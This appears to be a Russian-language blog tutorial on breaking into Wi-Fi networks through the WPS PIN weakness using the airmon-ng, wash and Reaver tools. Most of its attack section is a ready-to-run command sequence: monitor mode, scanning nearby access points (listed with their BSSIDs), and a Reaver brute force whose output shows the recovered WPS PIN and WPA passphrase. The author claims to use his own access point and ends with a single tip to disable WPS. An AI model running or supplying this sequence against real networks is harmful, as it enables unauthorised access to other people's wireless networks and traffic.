Wi-Fi Protected Setup (WPS) – стандарт, предназначенный для полуавтоматического создания беспроводной домашней сети, созданный Wi-Fi Alliance. Официально запущен 8 января 2007 года.
Целью протокола WPS является упрощение процесса настройки беспроводной сети, поэтому изначально он назывался Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях, и как следствие, имеют сложности при осуществлении настроек. WPS автоматически обозначает имя сети и задает шифрование, для защиты от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.
Push Button Configuration (PBC) – кнопка при нажатии которой осуществляется авто-поиск устройств с поддержкой WPS и дальнейшее подключение к точке доступа (AP).
Итак, для начала посмотрим, какие беспроводные интерфейсы имеются.
sudo airmon-ng
Переводим интерфейс wlan1 в режим монитора (monitor mode).
airmon-ng start wlan0
После того как wi-fi интерфейс настроен, просмотрим wi-fi сети, которые находятся в зоне действия.
sudo airodump-ng mon0
Кстати, можно так же использовать программу wash. Она позволяет просматривать точки доступа (AP), на которых включен WPS.
sudo wash -i mon0
Scanning for supported APS... BC:AE:C5:71:D3:17 hub-lex-AP 84:C9:B2:4C:E0:57 1-OJ 00:24:01:1B:1F:B3 more F0:7D:68:40:46:DE Okean 00:14:D1:E2:06:94 TRENDnet651 14:D6:4D:B5:07:4C DomTar
Закон нарушать мне не хочется, поэтому буду экспериментировать на своей AP.
sudo reaver -i mon0 -b BC:AE:C5:71:D3:17 -vv
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from BC:AE:C5:71:D3:17
[+] Associated with BC:AE:C5:71:D3:17 (ESSID: hub-lex-AP)
[+] 0.04% complete @ 2012-01-22 03:01:06 (5 seconds/attempt)
[+] 0.05% complete @ 2012-01-22 03:01:22 (6 seconds/attempt)
...
[+] 96.76% complete @ 2012-01-22 05:00:31 (4 seconds/attempt)
[+] 96.81% complete @ 2012-01-22 05:00:46 (4 seconds/attempt)
[+] 96.83% complete @ 2012-01-22 05:01:07 (4 seconds/attempt)
[+] 96.85% complete @ 2012-01-22 05:01:30 (4 seconds/attempt)
[+] 96.89% complete @ 2012-01-22 05:01:43 (4 seconds/attempt)
[+] 96.92% complete @ 2012-01-22 05:02:00 (4 seconds/attempt)
[+] 96.96% complete @ 2012-01-22 05:02:14 (4 seconds/attempt)
[+] 97.01% complete @ 2012-01-22 05:02:29 (4 seconds/attempt)
[+] 97.03% complete @ 2012-01-22 05:02:41 (4 seconds/attempt)
[+] 97.05% complete @ 2012-01-22 05:03:15 (4 seconds/attempt)
[+] 97.09% complete @ 2012-01-22 05:03:29 (4 seconds/attempt)
[+] 97.14% complete @ 2012-01-22 05:03:44 (4 seconds/attempt)
[+] WPS PIN: '31150545'
[+] WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7[STPO?tIK5k.M(V"k?P7X;jrcx'
[+] AP SSID: 'hub-lex-AP'
Как видите пароль был поставлен очень сложный, что не помешало добиться желаемого результата. Чтобы защититься от данного вида атаки, необходимо отключить службу WPS на роутере!
Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.
Дополнительные материалы:
6 comments On Reaver. Взлом Wi-Fi сети
Pingback: Взлом Wi-Fi сети WPA/WPA2 – перехват handshake – часть 1 - cryptoworld ()
Pingback: Все что нужно знать о Вардрайвинге (Wardriving). - Cryptoworld ()
Pingback: Геолокация по WI-FI. - Cryptoworld ()
Pingback: Как установить reaver в BackTrack 5 R1 - Cryptoworld ()
Pingback: WIFITE V2 инструмент для взлома Wi-Fi сетей. - Cryptoworld ()
Pingback: Взлом WIFI WPS с помощью Reaver. - Cryptoworld ()